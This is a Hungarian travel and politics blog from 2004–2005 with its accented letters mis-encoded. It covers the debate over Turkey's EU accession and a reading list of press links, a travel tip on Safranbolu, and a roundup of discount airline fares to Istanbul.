Magyarorszבg, miיrt akarnak esיlyt adni Tצrצkorszבg tagsבgבnak יs milyen feltיtelekkel?<br />Tudjuk-e, hogy a magyar politikai pבrtok יs a politikai elit mit gondol Tצrצkorszבg potenciבlis tagsבgבrףl יs az azzal kapcsolatos magyar יrdekekről? Mit tett a magyar politikai elit azיrt, hogy a magyar kצzvיlemיny megismerhesse a december 17-i (magyar) dצntיs indםtיkait, kצvetkezmיnyeit? Ismersz-e Szent-Ivבnyi Istvבn יs Petőcz Andrבs publikבciףin kםvl (lבsd a tצrצk-EU postot a blogon) יrtelmes םrבsokat a tצrצk csatlakozבssal kapcsolatos dilemmבinkrףl? Vitatkozott-e erről valaha a magyar Orszבggyűlיs, יrdekelte-e a kormבnyt a parlament vagy a tבrsadalom vיlemיnye, mielőtt a december 17-i uniףs csתcstalבlkozףn a magyar miniszterelnצk םgy vagy תgy בllבst foglal?<br />Mit tudunk a mai Tצrצkorszבgrףl? Melyik magyar politikai pבrt tבjיkozףdott az elmתlt 14, vagy legalבbb a tצrצk uniףs tagjelצlti stבtusz megadבsa ףta eltelt 5 יvben a helyszםnen - Ankarבban, Diyarbakirban, Mardinban, Erzurumban, Karsban, Vanban, Tunceliben vagy mבsutt a tצrצkorszבgi problיmבkrףl? Melyik politikai pבrt vagy civil szervezet talבlkozott ezekben a vבrosokban a tצrצk demokratבk, a kurd demokratבk, az alevik, a jogfosztott keresztיny felekezetek vagy a jogfosztott muszlimok kיpviselőivel, a jogfosztott civil tבrsadalom szervezeteivel, a jogfosztott vagy az elיgedett tצrצk בllampolgבrral? Amikor 2000-ben a magyar miniszterelnצk Tצrצkorszבgban jבrt, talבlkozott-e bבrkivel kצzlk? Miיrt kapta a legnagyobb magyar בllami kitntetיst 2001-ben a tצrצk hadsereg vezיrkari főnצke? Milyen civil szervezeteket segםtettnk az elmתlt 15 יvben mi, magyarok, mikצzben azok tיnylegesen יlet-halבlharcukat vםvtבk? Ma, 2004-ben melyik magyar NGO-nak vannak tצrצk kapcsolatai, egyבltalבn, tud-e bבrki bבrmit a tצrצk civilekről?<br />Miיrt tűnik termיszetesnek a magyar politikai osztבly szבmבra, hogy az Eurףpai Alkotmבnyos Szerződיsről nem kell/nem szksיges/nem indokolt nיpszavazבst tartani יs azt megelőzően kיshegyre menő tבrsadalmi vitבt folytatni? Miיrt gondolja pillanatnyilag azt a magyar politikai elit, hogy a magyar tבrsadalmat nem יrdekli Tצrצkorszבg uniףs csatlakozבsa?<br />A mתlt hףnapban lבttam az Indexen egy szavazבst, 12 ezer szavazףbףl kצzel 6 ezer תgy vיlekedett, hogy Tצrצkorszבgnak nincs helye az Eurףpai Uniףban. Az MNO fףrumבn lבtott hozzבszףlבsok is arrףl győztek meg: mבr rיgen tisztessיges tבrsadalmi vitבt kellett volna kezdennk a tצrצk uniףs csatlakozבsrףl. Termיszetes, hogy abban helye lett volna minden יrvnek - Mohבcstףl Bיcs ostromבig, Buda felszabadםtבsבtףl Kossuth ktahyai alkotmבnyבig, Ratzinger bםboros יrvelיsיtől Yunus Emre humanizmusבig, az צrmיny nיpirtבs tצrצk tagadבsבtףl a Makarios יrsek בltal szorgalmazott enozisig, a szבmunkra fontos uniףs forrבsok fיltיsיtől a tצrצk csatlakozבs hozadיkבig - , a fontos az lett volna, hogy kicsit okosabbak, tolerבnsabbak legynk, s hogy tudjuk: a magyar miniszterelnצk miיrt dצnt תgy, ahogy majd dצnt az Eurףpai Tanבcs december 17-18-i lיsיn a Tצrצkorszבggal valף csatlakozבsi tבrgyalבsok megkezdיsיről.<br />Kבr a most elszalasztott esיlyיrt - sajnos, ilyenek vagyunk. Bםzzunk abban, hogy ha a tצrצk csatlakozבsi tבrgyalבsok megkezdיsיről most megszletik a dצntיs, lesz elיg bצlcsessיgnk ahhoz, hogy rיszt vegynk a tצrצk-uniףs tבrsadalmi/kulturבlis/civil pבrbeszיdben, s talבn itthon is יrtelmes vita lesz a tצrצk csatlakozבsrףl.<br />Vבltozatlanul azt gondolom, amit oktףber 5-יn םrtam a blogban, a tצrצk-EU postban:<br />"Tצrצkorszבgnak helye van az Uniףban.De nem a mai Tצrצkorszבgnak יs nem ma.Tצrצkorszבg az elmתlt hבrom יvben irgalmatlanul nagyot lיpett előre, de egyelőre bevבltatlan םgיret. Ha azt mondjuk, hogy teljesםti a koppenhבgai politikai kritיriumokat, ez nem jelent mבst, mint az eddigi, pבr יves teljesםtmיnye alapjבn megelőlegezett bizalmat. Azt, hogy lehetsיges a jogבllamisבg, a demokrבcia megteremtיse, a transzparencia, a csatlakozבsi tבrgyalבsokkal pבrhuzamosan.Esיly, amelyet meg kell adni.Esיly, s יrtיkelni, mיrni kell, hogyan יlnek vele.Tצrצkorszבg nem Isztambul, nem Antalya, hanem Hakkari, Kars, Erzurum, Sivas יs Tunceli meg Diyarbakir. Szunnitבk יs alevitבk. Tצrצkצk, kurdok, meg mיg kיt tucat etnikum. Ugyanennyi יlő nyelv. A 28 kurd lבzadבs orszבga. Az elmתlt 80 יv sok zsבkutcבja יs sok eredmיnye. Modern viszonyok az orszבg egy rיszיben, tצrzsiek mבsutt. Ahogy az egysיges szovjet nemzetet sem sikerlt megteremteni, ugyanolyan kיtes eredmיnnyel jבrtak az elmתlt 80 יv egysיges nemzetבllami tצrekvיsei Tצrצkorszבgban is. Rengeteg mתltbיli sיrelem, amelyeket orvosolni kell. Rengeteg eltemetetlen halott, megbocsבtandף bűn, elkerlhetetlen bűnbבnבs. Vannak utak, amelyeket a tבrsadalomnak meg kell jבrnia, problיmבk, amelyeket nem lehet puccsokkal orvosolni, megoldבsok, amelyeket a tבrsadalomnak magבnak kell kikםnlףdnia.Ehhez יvtizedek szksיgesek. Mikיnt a tבrsadalmi יs gazdasבgi modernizבciףhoz is. Meg klső partnerek is, ezek volnבnk mi, uniףs tagבllamok. Olyanok, amilyenek vagyunk, ha erre mindig nem is lehetnk bszkיk.Jף megoldבs fog szletni, bםzzunk benne, oktףber 6-בn, meg majd december 17-יn is.Olyan, amely esיlyt kםnבl יs tבmogatבst ad Tצrצkorszבg gazdasבgi-tבrsadalmi modernizבciףjבhoz, de esיlyt ad Eurףpבnak is a vבltozבsra, arra, hogy befogadja ezt a bszke, makacs, fafejű, most mיg hol szצrnyen nacionalista, hol messzemenően tolerבns, hozzבnk hasonlף komporszבgot - liberבlis יrtelmisיgיvel, messianisztikus hadseregvezetיsיvel, jobb- יs baloldali meg etnikai szיlsősיgeseivel, - amelyek nemcsak plakבtot ragasztgatnak -, az irticבval, az lkckkel, a kemalista rיgi establishmenttel, Anadolu תj oroszlבnjaival, TSIAD-dal יs MSIAD-dal, mindenfelől indoktrinבlt, ki- יs felhasznבlt polgבraival.Akiket Ti is, יn is, annyira kedvelnk, de akiket Magyarorszבgon szinte egyבltalבn nem ismernk. Szףval, trelem kell, jףzan יsz, sok-sok munka, mindkיt oldalon. " </span></p><p align="left"><span style="font-size:85%;"><a href="http://news.yahoo.com/news?tmpl=story&u=/ap/20041205/ap_on_re_as/turkey_eu_reforms_1">Turkey OKs EU-Backed Criminal Code Changes</a> AP, 2004. dec. 4.</span></p><p align="left"><span style="font-size:85%;"><a href="http://news.yahoo.com/news?tmpl=story&amp;u=/ap/20041203/ap_on_re_mi_ea/turkey_problematic_patriarch_3">Turkey Policies on Minorities Spark Debate</a> AP, 2004. dec. 3. </span></p><p align="left"><span style="font-size:85%;"><a href="http://www.lrz-muenchen.de/~oeim/forostwp25.pdf">EU-Member Turkey? Preconditions, Consequences and Integration Alternatives</a> (EN .pdf) - Osteuropa Institut, Mnchen 2004. okt. <a href="http://www.bayern.de/Europa/Tuerkeistudie/Tuerkeistudie_dt.pdf">nיmet kivonat</a> (.pdf) <a href="http://www.bayern.de/Europa/Tuerkeistudie/Tuerkeistudie_en.pdf">alternatםv link</a> (EN .pdf)</span></p><div align="left"><span style="font-size:85%;"><a href="http://hvg.hu/hvg_friss_cikk.asp?oID=f8ce7223-a11b-4f7f-b45f-d289410ed106">Megint jőnek, kopogtatnak</a> HVG, Keresztes Imre, 2004. okt.6. </span></div><div align="justify"><span style="font-size:85%;"><a href="http://www.nol.hu/cikk/335484/">Tצrצk EU-csatlakozבs: tבrgytalan felhajtבs</a> NSZ okt. 6.</span></div><div align="justify"><span style="font-size:85%;"><a href="http://hvg.hu/szemle/cikk.asp?oID=6F21CB43-2035-4A65-8CC8-35956654145A">Tצrצkorszבg Eurףpבba kיszl </a>HVG, 2004. szept. 27.</span></div><div align="justify"><span style="font-size:85%;"><a href="http://www.nepszava.hu/default.asp?cCenter=article.asp&nID=690854">A tצrצk barבtom </a>Nיpszava, 2004. szept. 25. </span></div><div align="justify"><span style="font-size:85%;"><a href="http://www.eu2004.hu/index.php?op=hirek&amp;id=1326">Szabad az תt Tצrצkorszבg előtt</a> EU-vonal, 2004. szept. 24.</span></div><div align="justify"><span style="font-size:85%;"><a href="http://www.nol.hu/cikk/333772/">Magyar bizonytalansבg a tצrצk csatlakozבs gyיben</a> NSZ, 2004. szept.23.</span></div><div align="left"><span style="font-size:85%;"><a href="http://www.hrw.org/backgrounder/eca/turkey/2004/torture/">Folytatףdnak a kםnzבsok Tצrצkorszבgban</a> HRW, 2004. szept. 22. (EN, TR)</span></div><div align="left"></div><div align="justify"><span style="font-size:85%;"><a href="http://www.nol.hu/cikk/333476/">Ratzinger bםboros Tצrצkorszבg EU-tagsבga ellen </a>NSZ, 2004. szept.20.</span></div><div align="justify"></div><div align="justify"><span style="font-size:85%;"><a href="http://www.radio.hu/index.php?cikk_id=106143&rid=PT1RTjJBVE0=">Tצrצkorszבg felvיtelיvel az iszlבm veti meg a lבbבt az uniףban</a> Magyar Rבdiף szept 12.</span><br /><span style="font-size:85%;"><a href="http://www.magyarhirlap.hu/cikk.php?cikk=87759">Idיn eldől a tצrצk csatlakozבs sorsa</a> Magyar Hםrlap, 2004. szept. 13. </span></div><div align="justify"><span style="font-size:85%;"><a href="http://www.britishcouncil.org/brussels-independent_commission_on_turkey_report-english.pdf">Report of the Independent Commission on Turkey</a> 2004. szept.</span> <span style="font-size:85%;">(.pdf)</span><br /><span style="font-size:85%;"><a href="http://www.reuters.com/newsArticle.jhtml?type=worldNews&amp;storyID=6165186">More Kurdish Rights Needed in Turkey - Verheugen</a> 2004. szept. 7.</span></div><div align="justify"><span style="font-size:85%;"><a href="http://www.dw-world.de/english/0,3367,1430_A_1319102_1_A,00.html">EU Enlargement Chief Sees Turkey's 'Moment of Truth</a> 2004.szept. 7.</span></div><div align="justify"><span style="font-size:85%;"><a href="http://euobserver.com/?aid=17208&rk=1">"Fears of Turkish migrant influx 'vastly exaggerated"</a> 2004. szept.7.</span></div><div align="justify"></div><div align="left"><span style="font-size:85%;"><a href="http://www.bild.t-online.de/BTO/news/2004/09/02/fischer__tuerkei/fischer__tuerkei.html">Joschka Fischer:„Die Trkei ist ein zentraler Baustein Europas“</a> </span><span style="font-size:85%;">Bild, 2004. szept. 2.<br /></span><a href="http://euobserver.com/?aid=17170&amp;rk=1"><span style="font-size:85%;">Verheugen promises 'factual and fair' report on Turkey</span></a><span style="font-size:85%;"> 2004. szept.1.</span></div><div align="justify"><a href="http://story.news.yahoo.com/news?tmpl=story&u=/ap/20040825/ap_on_re_mi_ea/eu_turkey_1"><span style="font-size:85%;">Netherlands Panel Suggests Turkey-EU Talks</span></a><span style="font-size:85%;"> 2004. aug. 26.</span></div><div align="justify"><span style="font-size:85%;"><a href="http://euobserver.com/?aid=17146">Turkish EU talks should start within two years, Dutch report recommends</a> 2004. aug.26.</span></div><div align="justify"><a href="http://www.nytimes.com/2004/08/15/opinion/15sun3.html?ex=1093233600&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;en=79ecd79da849c9e2&ei=5006&amp;partner=ALTAVISTA1"><span style="font-size:85%;">Saying No to Turkey</span></a><span style="font-size:85%;"> New York Times, 2004. aug. 15.<br /></span><a href="http://www.dawn.com/2004/08/12/int7.htm"><span style="font-size:85%;">Turkey should join Arab bloc: Cardinal Ratzinger</span></a><span style="font-size:85%;"> </span><span style="font-size:85%;">Le Figaro Magazine, 2004. aug. 12. </span></div><div align="justify"><a href="http://www.businessweek.com:/print/bwdaily/dnflash/aug2004/nf20040811_1716_db056.htm?gb"><span style="font-size:85%;">Turkey in Transition</span></a><span style="font-size:85%;"> Business Week, 2004. augusztus 11. </span></div><div align="justify"><a href="http://www.meforum.org/pf.php?id=624"><span style="font-size:85%;">Talking Turkey: She's a democracy - no qualifiers</span></a><span style="font-size:85%;"> </span><span style="font-size:85%;">Middle East Forum, 2004. aug. 6.</span></div><div align="justify"><a href="http://www.turkishdailynews.com/old_editions/08_03_04/burak.HTM"><span style="font-size:85%;">Tribal Turkey</span></a><span style="font-size:85%;"> Turkish Daily News, 2004. augusztus 3. </span></div><div align="justify"><a href="http://www.cdu.de/index_4209.htm"><span style="font-size:85%;">Beitritt der Trkei zur EU kostet 45 Milliarden Euro</span></a><span style="font-size:85%;"> 2004. aug.20.<br /></span><a href="http://eescopinions.esc.eu.int/EESCopinionDocument.aspx?identifier=ces\rex\rex172\ces965-2004_ac.doc&language=EN"><span style="font-size:85%;">Az Eurףpai Gazdasבgi יs Szociבlis Bizottsבg vיlemיnye</span></a><span style="font-size:85%;"> 2004. aug. 7.</span></div><div align="justify"><a href="http://www.bianet.org/2004/07/01_eng/news40123.htm"><span style="font-size:85%;">Austria Shows Red Light To Turkey's E.U. Bid</span></a><span style="font-size:85%;"> 2004. aug.4.</span></div><div align="justify"><a href="http://www.bild.t-online.de/BTO/news/2004/08/02/erdogan/erdogan.html"><span style="font-size:85%;">Sind Sie Europהer, Herr Erdogan?</span></a><span style="font-size:85%;"> 2004. aug. 2.<br /></span><a href="http://euobserver.com/?aid=16962"><span style="font-size:85%;">Turkey rejects 'conditional yes' on EU membership talks</span></a><span style="font-size:85%;"> 2004. jתlius 21.</span></div><div align="justify"><a href="http://www.nybooks.com/articles/17240"><span style="font-size:85%;">Will Turkey Make It?</span></a><span style="font-size:85%;"> 2004. jתlius 15. </span></div><div align="justify"><a href="http://www.cdu.de/en/doc/Friends_of_Europe_Turkey.pdf"><span style="font-size:85%;">"Turkey and the EU: Just another enlargement?</span></a><span style="font-size:85%;"> (.pdf) 2004. jתnius </span></div><div align="justify"><a href="http://index.hu/politika/kulhirek/?main:2004.06.05.&amp;180961"><span style="font-size:85%;">Tצrצkorszבg mיg nem יrett az EU-tagsבgra</span></a><span style="font-size:85%;"> 2004. jתnius 5. </span></div><div align="justify"><a href="http://www.eu2004.hu/index.php?op=hirek&id=1116"><span style="font-size:85%;">Szigorodף EU-csatlakozבsi feltיtelek</span></a><span style="font-size:85%;"> 2004. mבjus 24.</span></div><div align="justify"><a href="http://hvg.hu/hvg_friss_cikk.asp?oID=9659518b-4ab2-42b4-adf8-eac339639983"><span style="font-size:85%;">Francia ellenבllבs</span></a><span style="font-size:85%;"> 2004. mבjus 12.</span></div><div align="justify"><a href="http://hvg.hu/hvg_friss_cikk.asp?oID=f591c7f2-de34-47e6-b431-98e8ce1a475d"><span style="font-size:85%;">Tצrצkצt fogtak</span></a><span style="font-size:85%;"> 2004. mבjus 12.</span></div><div align="justify"><span style="font-size:85%;"><a href="http://www.bruxinfo.hu/cgi-bin/writeeu.cgi?filename=/20040415/rovat15/cikk41.html">A tצrצk tagsבg megcבfolja majd a 'civilizבciףk tkצzיsיt</a> 2004. בpr.15.</span></div><div align="justify"><a href="http://www.eu2004.hu/index.php?op=hirek&amp;id=1007"><span style="font-size:85%;">A Parlament szerint Tצrצkorszבg mיg nem kיszlt fel az EU tagsבgra</span></a><span style="font-size:85%;"> </span><span style="font-size:85%;">2004. בpr. 2.</span></div><div align="justify"><a href="http://bocs.hu/csi/03/03-2majus.html"><span style="font-size:85%;">Tצrצkorszבg: Fיlhold Eurףpa fצlצtt?</span></a><span style="font-size:85%;"> 2003. mבjus</span></div><p><span style="color:#ff0000;"><strong>A legfontosabb linkek:</strong></span></p><div align="left"><span style="font-size:78%;"><strong>Az Eurףpai Bizottsבg tצrצkorszבgi kיpviseletיnek honlapja</strong> </span><a href="http://www.deltur.cec.eu.int/english/main-e.html"><span style="font-size:78%;"><strong>EN </strong></span></a><span style="font-size:78%;"><strong></strong></span><a href="http://www.deltur.cec.eu.int/main-t.html"><span style="font-size:78%;"><strong>TR</strong></span></a></div><br /><div align="left"><span style="font-size:78%;"><strong>EUTURKEY (a tצrצk kormבny uniףs בllamtitkבrsבgבnak honlapja) <a href="http://www.euturkey.org.tr/">EN</a> <a href="http://www.euturkey.org.tr/">TR</a></strong></span></div><br /><div align="left"><span style="font-size:78%;"><strong>ABHABER (Brsszelben műkצdő fggetlen tצrצk stבb honlapja) <a href="http://www.abhaber.com/english.asp">EN</a> <a href="http://www.abhaber.com/">TR</a></strong></span></div><br /></span></strong><div align="left"><strong><span style="font-size:78%;">Sok mבs, a tצrצk csatlakozבssal kapcsolatos linket a <a href="http://torokorszag.lap.hu/">torokorszag.lap.hu</a> oldalon talבlhatsz meg.</span></strong></div> -false - - - - -Efendi - -2004-09-22T23:13:24+02:00 -2004-09-22T22:20:24Z -2004-09-22T22:20:24Z - -tag:blogger.com,1999:blog-7074887.post-109589162422046517 -Tצrצk יtterem, kבvיzף, bolt Magyarorszבgon - -
    -
    ײsszeםrhatnבnk itt, hol vannak tצrצk יttermek יs kבvיzףk Magyarorszבgon, esetleg olyan boltok, amelyek tצrצk finomsבgokat בrulnak. Lehetne nיhבny szףt szףlni a kםnבlatrףl is, miיrt יrdemes odamenni vagy יppen messziről elkerlni.
    -
    -
    -false -
    - - - -Efendi - -2004-09-21T22:30:29+02:00 -2005-01-29T00:21:29Z -2004-09-21T20:52:00Z - -tag:blogger.com,1999:blog-7074887.post-109579992063092381 -Safranbolu/Yצrk kצy - -
    -
    Safranbolu a vilבgצrצksיg rיsze, nevיt a sבfrבnyrףl kapta. Kellemes, hangulatos kisvבros, ahol legalבbb fיl napot יrdemes eltצlteni, de nyugodtan lehet jף kצrlmיnyek kצzצtt יjszakבzni is. A 2-300 יves hבzak jף rיszיt helyreבllםtottבk, bבr sok mיg a romos יplet.
    -
    -
    -
    -
    Az Isztambul-Ankara autףpבlyבrףl Geredיnיl kell letיrni, az elבgazבs utבn bő egy ףra mיg az תt. ײsszekצthető fekete-tengeri kirבndulבssal (Bartin, Amasra), az Abant-tף vagy a Yedigצller nemzeti park megtekintיsיvel.
    -
    -
    -
    -
    A vבrosban sok szבlloda יs panziף van. Ajבnlom a Hotel Safrant (Ebrulu Konak) - tel. (370) 7120714 -, amely a vבroskצzpontban van (kיpek itt). ֹppen most felתjםtott villa a XIX. szבzad kצzepיről, jף egy tucat szobבja van. Link itt. Kellemes a Turing Havuzlu Hotel (tel. 370 - 7252883) יs a Kadioglu Sehzade Hotel (370 - 7125657) is. Helyi turista-informבciף: tel.(370) 7123863, itt ismerik a panziףkat is. -
    -
    A vבrostףl 8 km-re talבlhatף Yצrk kצy (Kastamonu irבnyבban), ahol a Sipahioglu Konagi nevű hבzat יrdemes megnיzni, hogy tudd, hogyan יltek a mףdos tצrצkצk 200 יvvel - 8 generבciףval ezelőtt. A hבzat az צrצkצsצk kיt rיszre vבlasztottבk szיt, mindkettő klצnbצző. A bal oldali rיsz nappalijבban Ali bey megmutatja a bektasi hagyomבnyokat, bבr most mבr mindenki szunnita יs egyre kevesebb dologra emlיkszik. Nem szabad kihagyni a falu mבsik nevezetessיgיt, a bektasiak mosodבjבt (camasirhane). -
    -
    -Efendi fיnykיpeit ezen a linken nיzheted meg. - -
    -
    -
    Safranbolurףl a lehető legrיszletesebb, angol nyelvű informבciףkat ezen az oldalon, rצvid, de rיszletes angol/nיmet/francia nyelvű ismertetőt (MyMerhaba) pedig itt talבlsz. Ez a safranbolui צnkormבnyzat oldala, mיg fejlesztיs alatt.
    -
    -
    -false -
    - - - -Efendi - -2004-09-13T23:45:00+02:00 -2005-04-29T16:54:20Z -2004-09-13T22:01:36Z - -tag:blogger.com,1999:blog-7074887.post-109511289600617572 -OLCS׃ REPJEGY! -<div align="justify"><span style="color:#ff0000;"><strong>MINDIG NֹZD MEG A HOZZֱSZ׃LֱSOKAT IS, LEHETNEK FRISS AJֱNLATOK OTT IS!</strong></span></div><div align="justify"><strong><span style="color:#ff0000;">--------------------------------------------------------------------------------------------</span></strong></div><div align="justify"><span style="color:#ff0000;"><strong></strong></span></div><div align="justify"><strong><span style="color:#ff0000;">2005. MֱJUS:</span></strong></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong> <br /></div><div align="justify"><strong></strong></div><div align="justify"><strong>Mבjus 1-15. kצzצtt MALֹV akciףs jegyek Isztambulba, rיszletekיrt hםvd a lיgitבrsasבgot.</strong></div><div align="justify"><strong></strong> <br /></div><div align="justify"><strong><span style="color:#000000;"><div align="justify"><span style="color:#ff0000;"><strong>--------------------------------------------------------------------------------------------</strong></span></div><div align="justify"><span style="color:#ff0000;"><strong><span style="color:#000000;">Korבbbi akciףk (ezeket csak a linkek meg a tanulsבgok miatt hagyom fenn)</span></strong></span></div><div align="justify"> <br /><br /></div><div align="justify"></div></span></strong></div><div align="justify"><strong><span style="color:#000000;">FEBRUֱRI - MֱRCIUSI AKCI׃K:</span></strong><br /></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong></div><div align="justify"><strong><span style="color:#ff0000;">KLM Isztambul-Bיcs retתr 169 USD! </span><span style="color:#000000;">Febr. 24. - mבrc. 14. kצzצtt kell foglalni, utazni pedig febr. 24. - mבrc. 31. kצzצtt lehet. Csak internetes foglalבs esetיn. <a href="http://www.klm.com/tr_en/index.jsp">LINK ITT!</a> (bal menben "specials and offers")</span></strong></div><div align="justify"><span style="color:#ff0000;"><strong></strong></span></div><div align="justify"><div align="justify"><span style="color:#ff0000;"><strong><span style="color:#000000;"></span></strong></span></div><span style="color:#ff0000;"><strong></strong></span><br /></div><div align="justify"><strong><span style="color:#000000;">JANUֱRI-FEBRUֱRI AKCI׃K:</span></strong></div><div align="justify"><span style="color:#000000;"><strong></strong><br /></span></div><div align="justify"><strong><span style="color:#ff0000;"><span style="color:#000000;">MALֹV Valentin-napi akciף febr. 12-20. kצzצtt Isztambulbףl:</span> </span><span style="color:#000000;">2 főre Isztambul/Budapest 300 dollבr, a jegyet febr. 12-ig meg kell venni. Informבciף: tel: (212) 232 48 39 Fax: (212) 230 20 34 mיl: <a href="mailto:Ceviz.Yesim@malev.hu">Ceviz.Yesim@malev.hu</a></span></strong></div><div align="justify"><strong></strong><br /></div><div align="justify"><strong><span style="color:#ff0000;">MALֹV DIֱK akciף 30 ezer + adף + illetיk </span><a href="http://www.malev.hu/BP/HUN/I_NEWS/2005-0107-1242-51AVSJ.asp"><span style="color:#ff0000;">LINK ITT</span></a><span style="color:#ff0000;"> jan. 10. - febr. 28.</span></strong></div><div align="justify"><strong></strong></div><div align="justify"><span style="color:#000000;"></span></div><div align="justify"><span style="color:#000000;"></span></div><div align="justify"><span style="color:#000000;"><strong>LUFTHANSA:</strong> Isztambul/Ankara/Izmirből Bיcsbe יs vissza: 198 dollבr + illetיk - יrvיnyes 2005. januבr 10-ig csak internetes foglalבs esetיn </span><a href="http://cms.lufthansa.com/fly/tr/en/0,4974,0-0-1123357,00.html"><span style="color:#000000;">LINK ITT</span></a></div><div align="justify"><span style="color:#000000;"><br /></span></div><div align="justify"><span style="color:#000000;"><strong>Osztrבk lיgitבrsasבg:</strong> Isztambulbףl egיsz Eurףpבba dec. 31-ig 238 dollבr </span><a href="http://www.aua.com/tr/eng/"><span style="color:#000000;">LINK ITT</span></a></div><div align="justify"><br /></div><div align="justify"><span style="color:#000000;"></span></div><div align="justify"><span style="color:#000000;">NOVEMBERI AKCI׃K:</span></div><div align="justify"><span style="color:#000000;"><br /></span></div><div align="justify"><span style="color:#000000;"></span></div><div align="justify"><span style="color:#000000;">MALֹV<br /></span></div><div align="justify"><span style="color:#000000;"><br /></span></div><div align="justify"><span style="color:#000000;"></span></div><div align="justify"><span style="color:#000000;">9900 forint, Budapest-Isztambul, megvבsבrolhatף nov.5-17. kצzצtt, leutazhatף nov. 5. - dec. 20. kצzצtt</span></div><div align="justify"><span style="color:#000000;"><br /></span></div><div align="justify"><span style="color:#000000;"></span></div><div align="justify"><span style="color:#000000;"></span></div><div align="justify"><span style="color:#000000;">Malיv Pבratlan Vבros akciף:<br /></span></div><div align="justify"><span style="color:#000000;"><br /></span></div><div align="justify"><span style="color:#000000;">Oktףber 15-יtől indult תj internetes akciףnk, melyben kיthetente mבs-mבs vבrosokba kםnבlunk 9900 forintיrt replőjegyet a Malיv weboldalבn vבsבrlףknak. Az akciף kצvetkező szakaszבban november 5-יtől Rףmבba, Bיcsbe יs Isztambulba utazhatnak akciףs jeggyel az online jegyvבsבrlףk. A fenti hבrom vבrosba akciףs jegyek vבsבrolhatףk 2004. november 5 - 17 kצzצtt, a jegyek korlבtozott szבmban בllnak rendelkezיsre. Utazבsi periףdus november 5. - december 20. A jegy tovבbbi feltיtelei: minimum egy szombat יjszakבt kint kell tצlteni, a replőjegy maximum egy hףnapig יrvיnyes, nem visszatיrםthető, nem mףdosםthatף, a foglalבsi alosztבlyok nem kombinבlhatףak. 0-12 יves korig 25% gyerekkedvezmיny יrvיnyesםthető. Az בr budapesti kiindulבssal, egy תtra יrvיnyes, csak online foglalבs esetיn יs nem tartalmazza a replőtיri illetיket יs egyיb dםjat. </span><a href="http://www.malev.hu/bp/hun/I_BOOK/" target="_self"><span style="color:#000000;">Helyfoglalבshoz kattintson ide!</span></a><span style="color:#000000;"> (Az akciףs jegyek csak november 5-től foglalhatףk!)</span></div><div align="justify"><span style="color:#000000;"><br /><br /></span></div><div align="justify"><strong><span style="color:#000000;">Oktףber 20. - nov. 12. kצzצtt THY akciףs retתr repjegy Bיcsből Tצrצkorszבgba 129 eurף, okt. 6. - nov. 11. kצzצtt THY Isztambul - Budapest retתr vagy Ankara - Bיcs retתr jegy 189 eurף, rיszletek a THY irodבkban יs a </span></strong><a href="http://www.turkishairlines.com.tr/en/index.php"><strong><span style="color:#000000;">tצrצk lיgitבrsasבg honlapjבn</span></strong></a><strong><span style="color:#000000;">.</span></strong></div><div align="justify"><span style="color:#000000;"></span></div><div align="justify"><span style="color:#000000;"></span></div><div align="justify"><span style="color:#000000;"></span></div><div align="justify"></div><div align="justify"><span style="color:#000000;"></span></div><div align="justify"><span style="color:#000000;">MALֹV akciףs jegy Isztambul-Budapest-Isztambul: kb. 250 dollבr</span></div><div align="justify"><span style="color:#000000;">Elmadag Cumhuriyet Caddesi 141-147, Umac apt. Istanbul 80230 Tel: +90 212 232 4839 / +90 212 241 0909 Fax: +90 212 230 2034 Email: </span><a href="mailto:istanbul@malev.hu"><span style="color:#000000;">istanbul@malev.hu</span></a><span style="color:#000000;"> Malיv Reptיri Iroda Tel: +90 212 465 4344 Tel/Fax: +90 212 663 0589</span></div><div align="justify"><span style="color:#000000;"><br /></span></div><div align="justify"><span style="color:#000000;"></span></div><div align="justify"><span style="color:#000000;">MALֹV akciףs jegy Isztambulba! (ֱllםtףlag 12.500 Ft-tףl)</span></div><div align="justify"><span style="color:#000000;"></span></div><div align="justify"><span style="color:#000000;">A jegyבrak egy תtra יrvיnyesek adףk יs illetיkek nיlkl. A replőjegyek 2004. szeptember 10 – oktףber 15 kצzצtt vבsבrolhatףk meg az interneten יs az utazבsi irodבkban</span>. Az utazבsi periףdus 2004. oktףber 15 – december 15. (az utazבst december 15-ig be kell fejezni.) Az akciףs jegyבrak 3 napos klfצldi tartףzkodבs, vagy egy szombat יjszaka kint tצltיse esetיn יrvיnyesek, a foglalבsok mףdosםtבsa nem lehetsיges. A jegyvבsבrlבs יs az utazבs kצzצtt minimum 14 napnak kell eltelnie. <a href="http://www.malev.hu/BP/HUN/I_NEWS/2004-0909-1608-24MHAT.asp">LINK ITT!</a></div><div align="justify"><br /></div><div align="justify">KLM akciףs jegy Isztambul-Bיcs retתr szept. 28. - okt. 19. kצzצtt (249 dollבr) <a href="http://transactions3.klm.com/ASPActionFares/query.asp?cc=TR&lang=EN&amp;prod=2931&dep=IST">LINK ITT!</a><br /></div><div align="justify">Ugyanez Air France-szal ugyanennyiיrt <a href="http://www.airfrance.com.tr/double6/TR/infolocale.nsf/(LookupPublishedWeb)/en-1OFSP-SO_AFKLM?OpenDocument#s1">LINK ITT!</a><br /></div><div align="justify">Tצrצk lיgitבrsasבg Budapestről Isztambulba יs mבs tצrצk vבrosokba 40 ezerיrt <a href="http://www.turkishairlines.hu/akcio.php">LINK ITT!</a></div><div align="justify">Ugyanez Tצrצkorszבg nagyobb vבrosaibףl Isztambulba, onnan Budapestre יs vissza kb 350 dollבr</div><div align="justify"></div><div align="justify"><span style="color:#ff0000;">Csak szeptember 13-19. kצzצtt</span> vehetsz kedvezmיnyes jegyet a KLM holland lיgitבrsasבg jבrataira Isztambul יs 27 eurףpai nagyvבros kצzצtt. Aki Magyarorszבgra akar utazni, annak a legjobb az Isztambul-Bיcs-Isztambul jבrat. Bיcsből mבr vonattal, busszal, stb meg lehet oldani az utat haza.<br /><br /><span style="color:#ff0000;">ֱr: 75 euro + reptיri illetיk (30-35 euro kצrl szokott lenni)<br /></span><br />Az ajבnlat:<br /><br />A jegy oda-vissza תtra szףl. Meg kell venni, ki kell fizetni Isztambulban szept. 13-19. kצzצtt! Minimבlis tartףzkodבs 3 nap (szombati napnak benne kell lennie), maximבlis 8 nap. A replיs Amsterdam יrintיsיvel 